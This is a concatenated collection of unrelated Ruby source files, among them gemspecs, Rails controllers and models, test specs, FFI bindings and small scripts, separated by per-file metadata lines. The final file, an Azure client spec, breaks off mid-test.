# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-directoryservice'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Directory Service'
spec.description = 'Official AWS Ruby gem for AWS Directory Service (Directory Service). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-directoryservice',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-directoryservice/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.112.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
| 38.25 | 135 | 0.675654 |
7aba2f1a3d543fbfd47d6d9b58906b2129bc4d58 | 576 | # frozen_string_literal: true
require 'semlogr/self_logger'
module Semlogr
module Sinks
class Filtering
def initialize(filters, sink)
@filters = filters
@sink = sink
end
def emit(log_event)
filtered = @filters.any? do |filter|
begin
filter.call(log_event)
rescue StandardError => e
SelfLogger.error("Failed to filter log event using filter #{filter.class}", e)
false
end
end
@sink.emit(log_event) unless filtered
end
end
end
end
| 19.862069 | 90 | 0.585069 |
bb6319321dd652f146b13b3c9c0a7d752143e37e | 2,969 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2016, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example gets all base rates belonging to a rate card.
require 'ad_manager_api'
def get_base_rates_for_rate_card(ad_manager, rate_card_id)
base_rate_service = ad_manager.service(:BaseRateService, API_VERSION)
# Create a statement to select base rates.
statement = ad_manager.new_statement_builder do |sb|
sb.where = 'rateCardId = :rate_card_id'
sb.with_bind_variable('rate_card_id', rate_card_id)
end
# Retrieve a small amount of base rates at a time, paging
# through until all base rates have been retrieved.
page = {:total_result_set_size => 0}
begin
# Get the base rates by statement.
page = base_rate_service.get_base_rates_by_statement(
statement.to_statement()
)
# Print out some information for each base rate.
unless page[:results].nil?
page[:results].each_with_index do |base_rate, index|
puts ('%d) Base rate with ID %d, type "%s", and rate card ID %d was ' +
'found.' % [index + statement.offset, base_rate[:id],
base_rate[:xsi_type], base_rate[:rate_card_id]]
end
end
# Increase the statement offset by the page size to get the next page.
statement.offset += statement.limit
end while statement.offset < page[:total_result_set_size]
puts 'Total number of base rates: %d' % page[:total_result_set_size]
end
if __FILE__ == $0
API_VERSION = :v201805
# Get AdManagerApi instance and load configuration from ~/ad_manager_api.yml.
ad_manager = AdManagerApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# ad_manager.logger = Logger.new('ad_manager_xml.log')
begin
rate_card_id = 'INSERT_RATE_CARD_ID_HERE'.to_i
get_base_rates_for_rate_card(ad_manager, rate_card_id)
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue AdManagerApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 34.523256 | 79 | 0.687774 |
21fbb68cda5fe419cf5766675868083ed5f3c60a | 2,502 | require File.expand_path(File.dirname(__FILE__) + '/test_helper.rb')
class TestFakerMeasurement < Test::Unit::TestCase
def setup
@tester = Faker::Measurement
end
def height
assert @tester.height.match(/\d\s[a-z]/)
assert @tester.height(1).match(/\d\s[a-z]/)
end
def height_all
assert @tester.height_all.match(/\d\s[a-z]/)
end
def height_none
assert @tester.height_none.match(/\d\s[a-z]/)
end
def length
assert @tester.length.match(/\d\s[a-z]/)
end
def length_all
assert @tester.length_all.match(/\d\s[a-z]/)
end
def length_none
assert @tester.length_none.match(/\d\s[a-z]/)
end
def volume
custom_amount_float = @tester.volume(1.5)
custom_amount_integer = @tester.volume(276)
assert @tester.volume.match(/\d\s[a-z]/)
assert custom_amount_float.match(/\d\s[a-z]+[s]\z/)
assert custom_amount_integer.match(/\d\s[a-z]+[s]\z/)
end
def volume_all
assert @tester.volume_all.match(/\A\D+[^s]\z/)
end
def volume_none
assert @tester.volume_none.match(/\A\D+[^s]\z/)
end
def weight
assert @tester.weight.match(/\d\s[a-z]/)
end
def weight_none
assert @tester.weight_none.match(/\d\s[a-z]/)
end
def weight_all
assert @tester.weight_all.match(/\d\s[a-z]/)
end
def metric_height
assert @tester.metric_height.match(/\d\s[a-z]/)
end
def metric_height_all
assert @tester.metric_height_all.match(/\d\s[a-z]/)
end
def metric_height_none
assert @tester.metric_height_none.match(/\d\s[a-z]/)
end
def metric_length
assert @tester.metric_length.match(/\d\s[a-z]/)
end
def metric_length_all
assert @tester.metric_length_all.match(/\d\s[a-z]/)
end
def metric_length_none
assert @tester.metric_length_none.match(/\d\s[a-z]/)
end
def metric_volume
assert @tester.metric_volume.match(/\d\s[a-z]/)
end
def metric_volume_all
assert @tester.metric_volume_all.match(/\d\s[a-z]/)
end
def metric_volume_none
assert @tester.metric_volume_none.match(/\d\s[a-z]/)
end
def metric_weight
assert @tester.metric_weight.match(/\d\s[a-z]/)
assert @tester.metric_weight(1).match(/\d\s[a-z]/)
end
def metric_weight_all
assert @tester.metric_weight_all.match(/\d\s[a-z]/)
end
def metric_weight_none
assert @tester.metric_weight_none.match(/\d\s[a-z]/)
end
def test_invalid_amount_error
amount = 'hello world!'
assert_raise ArgumentError do
@tester.volume(amount)
end
end
end
| 21.02521 | 68 | 0.671463 |
26426ac9df226b4eb6df95a97bd0b5ce86dae4b3 | 553 | class CspcrGel < ActiveRecord::Base
belongs_to :user
belongs_to :protocol
belongs_to :status
has_many :cspcr_gel_lanes
has_many :cspcr_products, :through => :cspcr_gel_lanes
has_many :cspcr_gel_images
scope :pendings, where(:status_id => Status.find_by_process_and_name(CspcrGel.to_s,:pending))
accepts_nested_attributes_for :cspcr_gel_lanes, :cspcr_gel_images
attr_accessible :cspcr_gel_lanes, :cspcr_product_ids, :cspcr_gel_lanes_attributes, :status_id, :note
validates :cspcr_products, :presence => :true
end
| 27.65 | 102 | 0.77396 |
ffd38ca826d6b5d909147a76af4c0be9745a94b6 | 840 | require "spec_helper"
describe Docks::Tags::Factory do
subject { Docks::Tags::Factory.instance }
it "does not allow multiline content" do
expect(subject.multiline?).to be false
end
it "only allows one tag per block" do
expect(subject.multiple_allowed?).to be false
end
describe "#process" do
it "marks the attribute as true" do
symbol = Docks::Containers::Symbol.new(name: "foo", factory: "")
Docks::Process.process(symbol)
expect(symbol[subject.name]).to be true
end
it "converts the symbol to be a factory container" do
symbol = Docks::Containers::Function.new(factory: "", name: "foo")
symbol = Docks::Process.process(symbol)
expect(symbol).to be_a Docks::Containers::Factory
expect(symbol.symbol_type).to eq Docks::Types::Symbol::FACTORY
end
end
end
| 28 | 72 | 0.684524 |
61ff6e2eddca09b5f703ea221493d3fa097bbe59 | 1,672 | require 'rails_helper'
RSpec.configure do |config|
# Specify a root folder where Swagger JSON files are generated
# NOTE: If you're using the rswag-api to serve API descriptions, you'll need
# to ensure that it's configured to serve Swagger from the same folder
config.swagger_root = Rails.root.to_s + '/swagger'
# Define one or more Swagger documents and provide global metadata for each one
# When you run the 'rswag:specs:to_swagger' rake task, the complete Swagger will
# be generated at the provided relative path under swagger_root
# By default, the operations defined in spec files are added to the first
# document below. You can override this behavior by adding a swagger_doc tag to the
# the root example_group in your specs, e.g. describe '...', swagger_doc: 'v2/swagger.json'
config.swagger_docs = {
'v1/swagger.json' => {
swagger: '2.0',
info: {
title: 'OwnYourData Data Vault API',
version: 'v1',
"description": "The data vault is the central element for securley storing personal data with OwnYourData.\n \n Further information:\n - learn more about the Data Vault at https://data-vault.eu\n - view other [OwnYourData Service API's](https://api-docs.ownyourdata.eu)",
"contact": {
"email": "[email protected]"
},
"license": {
"name": "MIT License",
"url": "https://opensource.org/licenses/MIT"
}
},
paths: {},
securityDefinitions: {
Bearer: {
description: "Authorization token",
type: :apiKey,
name: 'Authorization',
in: :header
}
}
}
}
end
| 39.809524 | 279 | 0.649522 |
1db4072a56982b691bb5e9b6ef61dac1919832d6 | 7,005 | #! /usr/bin/env ruby
# -*- coding: UTF-8 -*-
#
require 'efl/native'
require 'efl/native/edje'
require 'efl/native/elementary'
#
module Efl
#
module ElmLayout
#
FCT_PREFIX = 'elm_layout_' unless const_defined? :FCT_PREFIX
#
def self.method_missing meth, *args, &block
sym = Efl::MethodResolver.resolve self, meth, FCT_PREFIX
self.send sym, *args, &block
end
#
end
#
module Native
#
ffi_lib 'elementary.so.1'
#
# FUNCTIONS
fcts = [
# EAPI Evas_Object *elm_layout_add(Evas_Object *parent);
[ :elm_layout_add, [ :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_file_set(Evas_Object *obj, const char *file, const char *group);
[ :elm_layout_file_set, [ :evas_object, :string, :string ], :bool ],
# EAPI int elm_layout_freeze(Evas_Object *obj);
[ :elm_layout_freeze, [ :evas_object ], :int ],
# EAPI int elm_layout_thaw(Evas_Object *obj);
[ :elm_layout_thaw, [ :evas_object ], :int ],
# EAPI Eina_Bool elm_layout_theme_set(Evas_Object *obj, const char *clas, const char *group, const char *style);
[ :elm_layout_theme_set, [ :evas_object, :string, :string, :string ], :bool ],
# EAPI void elm_layout_signal_emit(Evas_Object *obj, const char *emission, const char *source);
[ :elm_layout_signal_emit, [ :evas_object, :string, :string ], :void ],
# EAPI void elm_layout_signal_callback_add(Evas_Object *obj, const char *emission, const char *source, Edje_Signal_Cb func, void *data);
[ :elm_layout_signal_callback_add, [ :evas_object, :string, :string, :edje_signal_cb, :pointer ], :void ],
# EAPI void *elm_layout_signal_callback_del(Evas_Object *obj, const char *emission, const char *source, Edje_Signal_Cb func);
[ :elm_layout_signal_callback_del, [ :evas_object, :string, :string, :edje_signal_cb ], :pointer ],
# EAPI Eina_Bool elm_layout_box_append(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_append, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_prepend(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_prepend, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_insert_before(Evas_Object *obj, const char *part, Evas_Object *child, const Evas_Object *reference);
[ :elm_layout_box_insert_before, [ :evas_object, :string, :evas_object, :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_box_insert_at(Evas_Object *obj, const char *part, Evas_Object *child, unsigned int pos);
[ :elm_layout_box_insert_at, [ :evas_object, :string, :evas_object, :uint ], :bool ],
# EAPI Evas_Object *elm_layout_box_remove(Evas_Object *obj, const char *part, Evas_Object *child);
[ :elm_layout_box_remove, [ :evas_object, :string, :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_box_remove_all(Evas_Object *obj, const char *part, Eina_Bool clear);
[ :elm_layout_box_remove_all, [ :evas_object, :string, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_table_pack(Evas_Object *obj, const char *part, Evas_Object *child_obj, unsigned short col, unsigned short row, unsigned short colspan, unsigned short rowspan);
[ :elm_layout_table_pack, [ :evas_object, :string, :evas_object, :ushort, :ushort, :ushort, :ushort ], :bool ],
# EAPI Evas_Object *elm_layout_table_unpack(Evas_Object *obj, const char *part, Evas_Object *child_obj);
[ :elm_layout_table_unpack, [ :evas_object, :string, :evas_object ], :evas_object ],
# EAPI Eina_Bool elm_layout_table_clear(Evas_Object *obj, const char *part, Eina_Bool clear);
[ :elm_layout_table_clear, [ :evas_object, :string, :bool ], :bool ],
# EAPI Evas_Object *elm_layout_edje_get(const Evas_Object *obj);
[ :elm_layout_edje_get, [ :evas_object ], :evas_object ],
# EAPI const char *elm_layout_data_get(const Evas_Object *obj, const char *key);
[ :elm_layout_data_get, [ :evas_object, :string ], :string ],
# EAPI void elm_layout_sizing_eval(Evas_Object *obj);
[ :elm_layout_sizing_eval, [ :evas_object ], :void ],
# EAPI Eina_Bool elm_layout_part_cursor_set(Evas_Object *obj, const char *part_name, const char *cursor);
[ :elm_layout_part_cursor_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_part_cursor_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_get, [ :evas_object, :string ], :string ],
# EAPI Eina_Bool elm_layout_part_cursor_unset(Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_unset, [ :evas_object, :string ], :bool ],
# EAPI Eina_Bool elm_layout_part_cursor_style_set(Evas_Object *obj, const char *part_name, const char *style);
[ :elm_layout_part_cursor_style_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_part_cursor_style_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_style_get, [ :evas_object, :string ], :string ],
# EAPI Eina_Bool elm_layout_part_cursor_engine_only_set(Evas_Object *obj, const char *part_name, Eina_Bool engine_only);
[ :elm_layout_part_cursor_engine_only_set, [ :evas_object, :string, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_edje_object_can_access_set(Evas_Object *obj, Eina_Bool can_access);
[ :elm_layout_edje_object_can_access_set, [ :evas_object, :bool ], :bool ],
# EAPI Eina_Bool elm_layout_edje_object_can_access_get(Evas_Object *obj);
[ :elm_layout_edje_object_can_access_get, [ :evas_object ], :bool ],
# EAPI Eina_Bool elm_layout_part_cursor_engine_only_get(const Evas_Object *obj, const char *part_name);
[ :elm_layout_part_cursor_engine_only_get, [ :evas_object, :string ], :bool ],
# EAPI Eina_Bool elm_layout_content_set(Evas_Object *obj, const char *swallow, Evas_Object *content);
[ :elm_layout_content_set, [ :evas_object, :string, :evas_object ], :bool ],
# EAPI Evas_Object *elm_layout_content_get(const Evas_Object *obj, const char *swallow);
[ :elm_layout_content_get, [ :evas_object, :string ], :evas_object ],
# EAPI Evas_Object *elm_layout_content_unset(Evas_Object *obj, const char *swallow);
[ :elm_layout_content_unset, [ :evas_object, :string ], :evas_object ],
# EAPI Eina_Bool elm_layout_text_set(Evas_Object *obj, const char *part, const char *text);
[ :elm_layout_text_set, [ :evas_object, :string, :string ], :bool ],
# EAPI const char *elm_layout_text_get(const Evas_Object *obj, const char *part);
[ :elm_layout_text_get, [ :evas_object, :string ], :string ],
]
#
attach_fcts fcts
#
end
end
#
# EOF
| 68.009709 | 195 | 0.683369 |
bf5d05de5ac5e0c9bcf5c9b0e570d4e7270c54bb | 477 | module ActiveMerchant
module Billing
class AmazonResponse < Response
attr_reader :constraints, :state, :destination, :email, :total
def initialize(success, message, params = {}, options = {})
@constraints = options[:constraints]
@state = options[:state]
@destination = options[:destination]
@email = options[:email]
@total = options[:total]
super(success, message, params, options)
end
end
end
end
| 28.058824 | 68 | 0.631027 |
b9028f3ce3f92767ca8fc83a582de964b2927344 | 613 | module PuppetX
module Sensuclassic
module ToType
def to_type(value)
if value.is_a?(Hash)
new = Hash.new
value.each { |k,v| new[k] = to_type v }
new
elsif value.is_a?(Array)
value.collect { |v| to_type v }
else
case value
when true, 'true', 'True', :true
true
when false, 'false', 'False', :false
false
when :undef
'undef'
when /^([0-9])+$/
value.to_i
else
value
end
end
end
end
end
end
| 20.433333 | 49 | 0.442088 |
ac19f8230806e092ed530ce6f0b393715766eef7 | 2,476 | class Api::V1::GamesController < ApplicationController
before_action :set_game, only: [:show, :show_genre, :update, :destroy, :wishlist, :destroy_wishlist]
# acts_as_token_authentication_handler_for User, only: [:create, :update, :destroy, :wishlist, :destroy_wishlist]
# before_action :isAdmin?, only: [:create, :update, :destroy]
def index
game = Game.all
render json: game
end
def show
render json: @game
end
def show_genre
gg = GameGenre.where(game_id: @game.id)
render json: gg
end
def create
game = Game.create(game_params)
if game.save
render json: game, status: :created
else
render json: game.errors, status: :unprocessable_entity
end
end
def update
if @game.update(game_params)
render json: @game
else
render json: @game.errors, status: :unprocessable_entity
end
end
def destroy
if @game.destroy
render json: {status: 'Success', message: 'Jogo apagado com sucesso'}
else
render json: { status: 'Error', message: 'Falha ao apagar o jogo'}, status: :unprocessable_entity
end
end
# Wishlist
def wishlist
wishlist = Wishlist.create(wishlist_params)
wishlist.game_id = @game.id
if wishlist.save
render json: wishlist, status: :created
else
render json: wishlist.errors.full_messages, status: :unprocessable_entity
end
end
def destroy_wishlist
user = User.find(params[:user])
puts "\n\n\n usuario #{user} \n\n\n"
if Wishlist.find_by(game_id: @game.id, user_id: user).present?
wishlist = Wishlist.find_by(game_id: @game.id, user_id: user)
if wishlist.destroy
render json: {status: 'Success', message: 'Jogo removido da sua lista de desejo'}
else
render json: { status: 'Error', message: 'Falha ao remover jogo da sua lista de desejo'}, status: :unprocessable_entity
end
else
render json: { status: 'Error', message: 'Falha ao encontrar o jogo na lista de desejo'}, status: :not_found
end
end
private
def set_game
unless Game.exists?(params[:id])
render json: { status: 'Error', message: 'Falha ao encontrar o jogo'}, status: :not_found
else
@game = Game.find(params[:id])
end
end
def game_params
params.require(:game).permit(:name, :price, :description, :developer, :trailer, :realese_date, images: [])
end
def wishlist_params
params.require(:wishlist).permit(:user_id)
end
end | 28.136364 | 127 | 0.67084 |
ed42a017ca945eb102f01222a0cad607d34ccef6 | 53 | class City < ApplicationRecord
has_many :works
end
| 13.25 | 30 | 0.792453 |
6aafdcf69435c3cceb5770eb3d1e1e6bf9b1185a | 175 | json.extract!(person,:id, :name, :surname, :cpf, :date_of_birth, :email, :created_at, :updated_at,
:license, :phones)
json.url person_url(person, format: :json)
| 43.75 | 98 | 0.668571 |
abe3dc02a032cda7ab78b4053fb6d84a42068f1f | 3,363 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::KeyVault::V2015_06_01
module Models
#
# Properties of the X509 component of a certificate.
#
class X509CertificateProperties
include MsRestAzure
# @return [String] The subject name. Should be a valid X509 Distinguished
# Name.
attr_accessor :subject
# @return [Array<String>] The enhanced key usage.
attr_accessor :ekus
# @return [SubjectAlternativeNames] The subject alternative names.
attr_accessor :subject_alternative_names
# @return [Array<KeyUsageType>] List of key usages.
attr_accessor :key_usage
# @return [Integer] The duration that the certificate is valid in months.
attr_accessor :validity_in_months
#
# Mapper for X509CertificateProperties class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'X509CertificateProperties',
type: {
name: 'Composite',
class_name: 'X509CertificateProperties',
model_properties: {
subject: {
client_side_validation: true,
required: false,
serialized_name: 'subject',
type: {
name: 'String'
}
},
ekus: {
client_side_validation: true,
required: false,
serialized_name: 'ekus',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
subject_alternative_names: {
client_side_validation: true,
required: false,
serialized_name: 'sans',
type: {
name: 'Composite',
class_name: 'SubjectAlternativeNames'
}
},
key_usage: {
client_side_validation: true,
required: false,
serialized_name: 'key_usage',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'KeyUsageTypeElementType',
type: {
name: 'String'
}
}
}
},
validity_in_months: {
client_side_validation: true,
required: false,
serialized_name: 'validity_months',
constraints: {
InclusiveMinimum: 0
},
type: {
name: 'Number'
}
}
}
}
}
end
end
end
end
| 30.026786 | 79 | 0.475171 |
e299f5a4ade6988d93ef166d7bc226c387d82120 | 1,312 | require 'guard/dsl'
require 'guardfile/dsl/action'
require 'guardfile/dsl/change'
module Guard
class Dsl
def run action
Action.new(self, action)
end
def on_change_in *patterns, &action
return Change.new(self, patterns) unless block_given?
patterns.each do |pattern|
UI.info "Watching #{pattern}"
watch(pattern_regexp(pattern)) do |match_data|
UI.info "Change in: #{fill_with_matches(pattern, match_data)}"
build_action(action.call, match_data)
end
end
end
def method_missing method, options = {}, &action
super unless method.to_s =~ /^with_(.+)$/
guard($1, options) do
rules = action.call
next unless rules.is_a? Hash
rules.each do |command, patterns|
on_change_in(*Array(patterns)){ command }
end
end
end
private
def fill_with_matches string, match_data
string.gsub(?*).each_with_index{ |_, i| match_data[i+1] }
end
def build_action command, match_data
case command
when String
fill_with_matches(command, match_data)
when Proc
command.call
else
command
end
end
def pattern_regexp pattern
/^#{Regexp.escape(pattern).gsub('\\*', '(.*)')}$/i
end
end
end
| 22.62069 | 72 | 0.615091 |
6113c3179d4c2e0167e1a5d7344983374c5056b9 | 1,148 | module Store
module Assocs
def to_associations_pk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:resource_pk] = val
end
def to_associations_occurrence_fk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:occurrence_resource_fk] = val
end
def to_associations_target_occurrence_fk(field, val)
@models[:assoc] ||= {}
@models[:assoc][:target_occurrence_resource_fk] = val
end
def to_associations_predicate(field, val)
@models[:assoc] ||= {}
@models[:assoc][:predicate] = val
end
def to_associations_source(field, val)
@models[:assoc] ||= {}
@models[:assoc][:source] = val
end
def to_associations_ref_fks(field, val)
@models[:assoc] ||= {}
@models[:assoc][:ref_sep] ||= field.submapping
@models[:assoc][:ref_fks] = val
end
def to_associations_meta(field, val)
@models[:assoc] ||= {}
@models[:assoc][:meta] ||= {}
@models[:assoc][:meta][field.submapping] = val
end
# NOTE: JH said it's okay to skip these for MVP.
# def to_traits_attributions_fk(field, val)
# end
end
end
| 25.511111 | 59 | 0.608885 |
e9d69373fe98502c02ab4ec9a4baf5131d73ed9d | 807 | require 'daimon/exhibition/model'
require 'daimon/exhibition/controller'
module Daimon
module Exhibition
class Engine < ::Rails::Engine
isolate_namespace Daimon::Exhibition
initializer 'daimon-exhibition.setup' do |app|
ActiveSupport.on_load :active_record do
ActiveRecord::Base.singleton_class.prepend Module.new {
def inherited(base)
super
base.include Model unless base < Model
end
}
end
ActiveSupport.on_load :action_controller do
ActionController::Base.singleton_class.prepend Module.new {
def inherited(base)
super
base.include Controller unless base < Controller
end
}
end
end
end
end
end
| 24.454545 | 69 | 0.608426 |
5d2fbab328aef7a0a45e22ab522a1d6de29b411a | 115 | class HeartbeatController < CalsBaseController
skip_before_action :authenticate_with_cwds
def show
end
end
| 14.375 | 46 | 0.826087 |
1166f8caeaf698c11ae0b195eb933de56508a0c9 | 1,771 |
module RSpec
module Matchers
module Sequel
# TODO: refactor with Sequel API
# http://www.rubydoc.info/gems/sequel/4.13.0/Sequel/Postgres/EnumDatabaseMethods
class HaveEnum
def matches?(db)
@db = db
enum_exists? && with_valid_values?
end
def failure_message_when_negated
"expected database not to #{@description} #{@error}"
end
def failure_message
"expected database to #{description} #{@error}"
end
def with_values(*values)
@enum_values = values.flatten
self
end
private
def description
text = [%(have enum named "#{@enum_name}")]
text << %(with values "#{@enum_values}") unless @enum_values.empty?
text.join(' ')
end
def enum_exists?
[email protected]("SELECT '#{@enum_name}'::regtype;").first
rescue ::Sequel::DatabaseError => e
if e.message[0..18] == 'PG::UndefinedObject'
@error = "but it doesn't exist"
return false
end
raise e
end
def with_valid_values?
return true if @enum_values.empty?
sql = "SELECT e.enumlabel FROM pg_enum e JOIN pg_type t ON t.oid = e.enumtypid WHERE t.typname = '#{@enum_name}';"
values = @db.fetch(sql).map { |enum| enum[:enumlabel] }
if @enum_values.sort == values.sort
true
else
@error = "but got #{values}"
false
end
end
def initialize(enum_name)
@enum_values = []
@enum_name = enum_name
end
end
def have_enum(enum_name)
HaveEnum.new(enum_name)
end
end
end
end
| 25.3 | 124 | 0.539243 |
5dbad98d53efcb327f26b34620ac53736197b001 | 513 | Rails.application.routes.draw do
# Authetication Route - JWT Token
post 'auth' => 'authentication#auth'
# District Routes
resources :districts, only: [:index, :show] do
# Judging Body Routes
resources :judging_bodies, only: [:index]
end
resources :judging_bodies, only: [:show]
# Process Class Routes
resources :process_classes, only: [:index, :show]
# Justice Process and Movements
resources :justice_processes do
resources :process_movements, only: [:index, :show]
end
end
| 24.428571 | 55 | 0.709552 |
21bd9c23014f6fb42d8c71688160982ef8114f6a | 895 | require "spec_helper"
module Stachio
describe TemplatesController do
describe "routing" do
it "routes to #index" do
get("/").should route_to("stachio/templates#index")
end
it "routes to #new" do
get("/new").should route_to("stachio/templates#new")
end
it "routes to #show" do
get("/1").should route_to("stachio/templates#show", :id => "1")
end
it "routes to #edit" do
get("/1/edit").should route_to("stachio/templates#edit", :id => "1")
end
it "routes to #create" do
post("/").should route_to("stachio/templates#create")
end
it "routes to #update" do
put("/1").should route_to("stachio/templates#update", :id => "1")
end
it "routes to #destroy" do
delete("/1").should route_to("stachio/templates#destroy", :id => "1")
end
end
end
end
| 23.552632 | 77 | 0.579888 |
1a71ddc2a0e3c077ba25c9d0a320cca75c278cc0 | 448 | # == Schema Information
#
# Table name: newsletters
#
# created_at :datetime not null
# id :bigint(8) not null, primary key
# published_on :date not null
# title :text not null
# updated_at :datetime not null
# url :text not null
#
class Newsletter < ApplicationRecord
has_one_attached :image
validates_presence_of :title, :url, :published_on
end
| 24.888889 | 55 | 0.587054 |
6a15cf3da3f2b949d840c6b7ba49d59f1a034cfa | 1,367 | @@max = ARGV[0] || 100
@@max = @@max.to_i
@@input = 0
@@output = 0
@@others = []
def commas n
n.to_s.reverse.gsub(/...(?=.)/,'\&,').reverse
end
class Counter
def initialize
@count = 0
@fanout = 0
@subsequent = {}
end
def value
@count
end
def subsequent seg
unless @subsequent.has_key? seg
@subsequent[seg] = Counter.new
@fanout += 1
end
return @subsequent[seg]
end
def count! segments
@count += 1 if segments.length == 0
return unless segments.length > 0
seg = segments.shift
if @fanout >= @@max
subsequent("(OTHER)").count! []
else
subsequent(seg).count! segments
end
end
def report keys
unless @count < 1 then
line = "#{keys.join(' / ')} -- #{@count}"
# puts line
@@others << line if keys.last == "(OTHER)"
@@output += 1
end
@subsequent.sort_by{|k,v| [-v.value, k]}.each do |key, count|
keys.push key
count.report keys
keys.pop
end
end
end
@root = Counter.new
STDIN.readlines.each do |line|
@@input += 1
seq = line.chomp.split(/[ \/\t?&]/)
# seq.shift
@root.count! seq
end
@root.report ['']
STDERR.puts "
If segments clamped to #{@@max} names:
#{commas @@input} input => #{commas @@output} output (#{'%.02f' % (100.0*(@@input-@@output)/@@input)}% clamped)
#{@@others.join("\n")}
"
| 18.726027 | 111 | 0.561083 |
0318170b22591d07d624e12d7d54f39938465642 | 597 | STDOUT.sync = true
Signal.trap("TERM") do
say "exiting"
exit
end
def say msg
puts "\t[inc] #{Time.now.strftime("%T")} #{$$} #{msg}"
end
class Inc
def initialize file
@file = file
end
def run
launched = Time.now.to_i
say "launching in #{File.dirname(@file)}"
i = 0
while i < 100
say "writing #{launched}/#{i} to #{File.basename(@file)}"
File.open(@file, "w") do |f|
f.puts(launched)
f.puts(i)
f.puts($$)
f.puts(Process.ppid)
end
sleep 0.5
i+=1
end
end
end
Inc.new(ARGV[0] || "./inc.txt").run
| 16.135135 | 63 | 0.537688 |
117cddb70945e0077bcea3cdbc24814a4bf274ec | 5,937 | # frozen_string_literal: true
require 'spec_helper'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
describe Bosh::AzureCloud::AzureClient do
let(:logger) { Bosh::Clouds::Config.logger }
let(:azure_client) do
Bosh::AzureCloud::AzureClient.new(
mock_azure_config,
logger
)
end
let(:subscription_id) { mock_azure_config.subscription_id }
let(:tenant_id) { mock_azure_config.tenant_id }
let(:api_version) { AZURE_API_VERSION }
let(:api_version_network) { AZURE_RESOURCE_PROVIDER_NETWORK }
let(:resource_group) { 'fake-resource-group-name' }
let(:request_id) { 'fake-request-id' }
let(:token_uri) { "https://login.microsoftonline.com/#{tenant_id}/oauth2/token?api-version=#{api_version}" }
let(:operation_status_link) { "https://management.azure.com/subscriptions/#{subscription_id}/operations/#{request_id}" }
let(:public_ip_name) { 'fake-public-ip-name' }
let(:valid_access_token) { 'valid-access-token' }
let(:expires_on) { (Time.new + 1800).to_i.to_s }
before do
allow(azure_client).to receive(:sleep)
end
describe '#create_public_ip' do
let(:public_ip_uri) { "https://management.azure.com/subscriptions/#{subscription_id}/resourceGroups/#{resource_group}/providers/Microsoft.Network/publicIPAddresses/#{public_ip_name}?api-version=#{api_version_network}" }
let(:location) { 'fake-location' }
context 'when token is valid, create operation is accepted and completed' do
context 'when creating static public ip' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: true
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Static'
}
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
